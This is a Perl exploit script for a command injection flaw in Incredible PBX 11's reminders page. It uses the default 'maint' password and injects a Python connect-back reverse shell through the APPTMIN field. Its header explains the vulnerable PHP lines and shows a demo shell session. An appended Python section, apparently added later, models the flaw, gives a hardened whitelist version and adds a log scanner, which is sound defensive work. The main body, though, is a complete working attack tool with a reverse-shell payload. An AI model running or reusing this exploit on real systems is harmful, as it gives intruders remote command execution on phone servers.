#!/usr/bin/perl
#
# Title: Incredible PBX remote command execution exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 1 September 2014
# Coded: 21 October 2014
# Published: 21 October 2014
# MorXploit Research
# http://www.MorXploit.com
#
# Vendor: PBX in a Flash
# Vendor url: http://pbxinaflash.net/
# Software: Incredible PBX 11
# Version: 2.0.6.5.0
# Product url: http://incrediblepbx.com/
# Vulnerable file: reminders/index.php
#
# About (from their website):
# Incredible PBX is a secure and feature-rich implementation of the terrific Asterisk(R) PBX. By rethinking the PBX
# security model from the ground up, Incredible PBX was engineered to provide rock-solid security while delivering the
# most comprehensive collection of Asterisk utilities available on the planet including free calling in the U.S. and
# Canada courtesy of Google Voice.
#
# Description:
# reminders/index.php, which ships with Incredible PBX, suffers from a command injection vulnerability that lets an
# authenticated user (the 'maint' HTTP Basic account) run arbitrary commands as the asterisk user.
#
# Vulnerable code (line numbers refer to reminders/index.php):
# 484: $retcode3 = system("sox $tmpwave -r 8000 -c 1 $newgsm");
# 472: $tmpwave = "/tmp/$token.wav";
# 469: $token = md5(uniqid(""));
# 483: $newgsm = "/var/lib/asterisk/sounds/custom/" . $APPTTIME . "." . $APPTDT . "." . $APPTPHONE . ".gsm";
# 381: $APPTTIME = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTTIME);
# 375: $APPTTIME = $_REQUEST['APPTHR'] . $_REQUEST['APPTMIN'];
# 380: $APPTDT = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTDT);
# 374: $APPTDT = $_REQUEST['APPTYR'] . $_REQUEST['APPTMO'] . $_REQUEST['APPTDA'];
# 382: $APPTPHONE = str_replace(array(chr(13), chr(10), "<", ">", " ", "(", ")", "-", "."), "", $APPTPHONE);
# 376: $APPTPHONE = $_REQUEST['APPTPHONE'];
#
# Apart from stripping CR, LF, '<' and '>' (and, for APPTPHONE, also space, '(', ')', '-' and '.'), none of the
# $_REQUEST[] values is validated or escaped before being concatenated into the string handed to system(). A ';'
# in APPTHR, APPTMIN, APPTYR, APPTMO or APPTDA therefore terminates the sox command and starts a new one, and
# everything up to the next ';' runs as the asterisk user. APPTPHONE is a poorer injection point because spaces
# and '-' are removed from it.
#
# Exploit:
# As PoC, the perl code below injects a python connect-back shell through $_REQUEST['APPTMIN'].
#
# Note:
# Access to reminders/index.php requires the 'maint' password; the exploit uses the default installation
# password, which is 'password'.
#
# Demo:
# ====================================================
# --- Incredible PBX remote command execution exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ====================================================
# [*] MorXploiting http://10.0.0.20/reminders/index.php
# [+] Sent payload! Waiting for connect back shell ...
# sh: no job control in this shell
# sh-4.1$ id; cat /etc/issue
# id; cat /etc/issue
# uid=498(asterisk) gid=497(asterisk) groups=497(asterisk)
# CentOS release 6.5 (Custom) on \m
# Welcome to PBX in a Flash - Green
# Please log in to continue
# ******************************************
# Your IP Address is:
#
# 10.0.0.20
# ******************************************
#
# Download:
# http://www.morxploit.com/morxploits/morxincpbx.pl
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install perl-libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.

use strict;
use warnings;
use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;    # also exports the SHUT_* constants from Socket

sub banner {
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    print "====================================================\n";
    print "--- Incredible PBX remote command execution exploit\n";
    print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
    print "--- MorXploit Research www.MorXploit.com\n";
    print "====================================================\n";
}

# All three arguments are required (defined() on an &&-expression only ever tested a boolean).
if (@ARGV < 3) {
    banner();
    print "perl $0 <target> <connectbackIP> <connectbackport>\n";
    print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";
    exit;
}

my $host    = $ARGV[0];
my $vuln    = "reminders/index.php";
my $cbhost  = $ARGV[1];
my $cbport  = $ARGV[2];
my $defuser = "maint";       # Default maint user
my $defpass = "password";    # Default maint pass
my $string  = "$defuser:$defpass";
# Second argument "" suppresses the trailing newline encode_base64 adds by default,
# which would otherwise end up inside the Authorization header value.
my $encoded = encode_base64($string, '');

$| = 1;
$SIG{CHLD} = 'IGNORE';

# Listen before sending the payload so the connect-back cannot race the accept().
my $l_sock = IO::Socket::INET->new(
    Proto     => "tcp",
    LocalPort => "$cbport",
    Listen    => 1,
    LocalAddr => "0.0.0.0",
    Reuse     => 1,
) or die "[-] Could not listen on $cbport: $!\n";

sub randomagent {
    my @array = (
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
    );
    my $random = $array[rand @array];
    return ($random);
}

my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);

# Check that the maint credentials are accepted before firing the payload.
my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");
unless ($status->is_success) {
    banner();
    print "[-] Error: " . $status->status_line . "\n";
    exit;
}

banner();
print "[*] MorXploiting $host/$vuln\n";

# Python connect-back shell; the ';' on either side of it splits it out of the sox command line.
my $payload = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$cbhost\",$cbport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";
my $get = "APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=;$payload;&APPTHR=morx";

# system() in the PHP does not return until the injected shell exits, so this request only comes
# back on the 10 s LWP timeout; by then the shell's connection is already queued on the listener.
my $exploit = $ua->get("$host/$vuln?$get", Authorization => "Basic $encoded");
print "[+] Sent payload! Waiting for connect back shell ...\n";

my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);

# Relay the shell: child copies socket -> STDOUT, parent copies STDIN -> socket.
sub copy_data_bidi {
    my ($socket) = @_;
    my $child_pid = fork();
    if (!$child_pid) {
        close(STDIN);
        copy_data_mono($socket, *STDOUT);
        $socket->shutdown(SHUT_RD);
        exit();
    }
    else {
        close(STDOUT);
        copy_data_mono(*STDIN, $socket);
        $socket->shutdown(SHUT_WR);
        kill("TERM", $child_pid);
    }
}

sub copy_data_mono {
    my ($src, $dst) = @_;
    my $buf;
    while (my $read_len = sysread($src, $buf, 4096)) {
        my $offset = 0;
        while ($offset < $read_len) {
            # Resume from $offset so a short write does not resend bytes already written.
            my $written_len = syswrite($dst, $buf, $read_len - $offset, $offset);
            return unless $written_len;
            $offset += $written_len;
        }
    }
}
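The following is an added example, not code from Incredible PBX or from the exploit author. It models the string handling quoted under "Vulnerable code" so you can see exactly what reaches system() for the exploit's query string (and why APPTMIN was a better injection point than APPTPHONE), puts a hardened builder next to it, and runs the same whitelist over access-log lines as a detection check. Assumptions: the token is a fixed stand-in for md5(uniqid("")), the FIELD_RULES whitelist is mine rather than anything the project ships, and the log lines are constructed for the example.

```python
"""Model of reminders/index.php command construction, a hardened rewrite, and a log check.

Added example, not Incredible PBX code.  Paths follow the quoted PHP; TOKEN stands in
for md5(uniqid("")); FIELD_RULES and SAMPLE_LOG are constructed for this example.
"""
import re
from urllib.parse import parse_qsl

SOUNDS_DIR = "/var/lib/asterisk/sounds/custom/"
TOKEN = "0123456789abcdef0123456789abcdef"  # stand-in for the per-request md5(uniqid("")) token

# What the original str_replace() calls strip before the values reach system().
TIME_DATE_STRIP = ["\r", "\n", "<", ">"]                   # lines 380-381
PHONE_STRIP = TIME_DATE_STRIP + [" ", "(", ")", "-", "."]  # line 382


def php_strip(value, chars):
    """Equivalent of str_replace(array(...), "", $value)."""
    for c in chars:
        value = value.replace(c, "")
    return value


def build_sox_command_vulnerable(req):
    """Lines 374-382 and 483-484: raw request values concatenated into the shell command.

    A ';' in any time/date field ends the sox command and starts a new one.
    """
    def get(k):
        return req.get(k, "")  # an undefined $_REQUEST index behaves as "" in PHP
    apptdt = php_strip(get("APPTYR") + get("APPTMO") + get("APPTDA"), TIME_DATE_STRIP)
    appttime = php_strip(get("APPTHR") + get("APPTMIN"), TIME_DATE_STRIP)
    apptphone = php_strip(get("APPTPHONE"), PHONE_STRIP)
    tmpwave = f"/tmp/{TOKEN}.wav"
    newgsm = f"{SOUNDS_DIR}{appttime}.{apptdt}.{apptphone}.gsm"
    return f"sox {tmpwave} -r 8000 -c 1 {newgsm}"


# Hardened form: every field must fully match a whitelist (our rules, not the project's), and the
# command is built as an argv list so no shell parses the values.  The PHP equivalent is
# ctype_digit()/preg_match() checks plus escapeshellarg() on every interpolated value.
FIELD_RULES = {
    "APPTYR": re.compile(r"\d{4}"),
    "APPTMO": re.compile(r"0[1-9]|1[0-2]"),
    "APPTDA": re.compile(r"0[1-9]|[12]\d|3[01]"),
    "APPTHR": re.compile(r"[01]\d|2[0-3]"),
    "APPTMIN": re.compile(r"[0-5]\d"),
    "APPTPHONE": re.compile(r"\d{3,15}"),
}


def check_fields(req):
    """Return the names of fields that are missing or fail their whitelist."""
    return [name for name, rule in FIELD_RULES.items() if not rule.fullmatch(req.get(name, ""))]


def build_sox_command_hardened(req):
    bad = check_fields(req)
    if bad:
        raise ValueError("rejected fields: " + ", ".join(bad))
    apptdt = req["APPTYR"] + req["APPTMO"] + req["APPTDA"]
    appttime = req["APPTHR"] + req["APPTMIN"]
    newgsm = f"{SOUNDS_DIR}{appttime}.{apptdt}.{req['APPTPHONE']}.gsm"
    # Hand this to subprocess.run(argv): no shell, so metacharacters are inert even if a rule is loosened.
    return ["sox", f"/tmp/{TOKEN}.wav", "-r", "8000", "-c", "1", newgsm]


def flag_suspicious_requests(log_lines):
    """Scan Apache-style access log lines for reminders/index.php requests whose appointment
    parameters would fail the whitelist; returns (line_no, field) pairs."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"GET /reminders/index\.php\?([^" ]*)', line)
        if not m:
            continue
        for name, raw in parse_qsl(m.group(1), keep_blank_values=True):  # decodes %3B etc.
            rule = FIELD_RULES.get(name)
            if rule and not rule.fullmatch(raw):
                hits.append((n, name))
    return hits


# Constructed log lines: a legitimate reminder, then the exploit's query string as the web server
# would record it (python one-liner shortened, percent-encoded by the client).
SAMPLE_LOG = [
    '10.0.0.2 - maint [21/Oct/2014:12:00:01 +0000] "GET /reminders/index.php?APPTYR=2014&APPTMO=10&APPTDA=21&APPTHR=09&APPTMIN=30&APPTPHONE=5551234567 HTTP/1.1" 200 512',
    '10.0.0.2 - maint [21/Oct/2014:12:00:05 +0000] "GET /reminders/index.php?APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=%3Bpython%20-c%20%27import%20socket%27%3B&APPTHR=morx HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    exploit_req = {"APPTDA": "morx", "APPTPHONE": "morx", "APPTMO": "morx", "APPTMIN": ";id;", "APPTHR": "morx"}
    print(build_sox_command_vulnerable(exploit_req))
    print(check_fields(exploit_req))
    print(flag_suspicious_requests(SAMPLE_LOG))
```

Running the vulnerable builder with the exploit's fields shows the injected `;id;` sitting between `sox ... custom/morx` and `.morxmorx.morx.gsm` on one command line; feeding the same payload through APPTPHONE instead loses its spaces and hyphens, which is why the PoC targets APPTMIN. The log check is deliberately positive-model: anything in these six fields that is not the expected digits is flagged, so percent-encoding or an unfamiliar interpreter name does not slip past it.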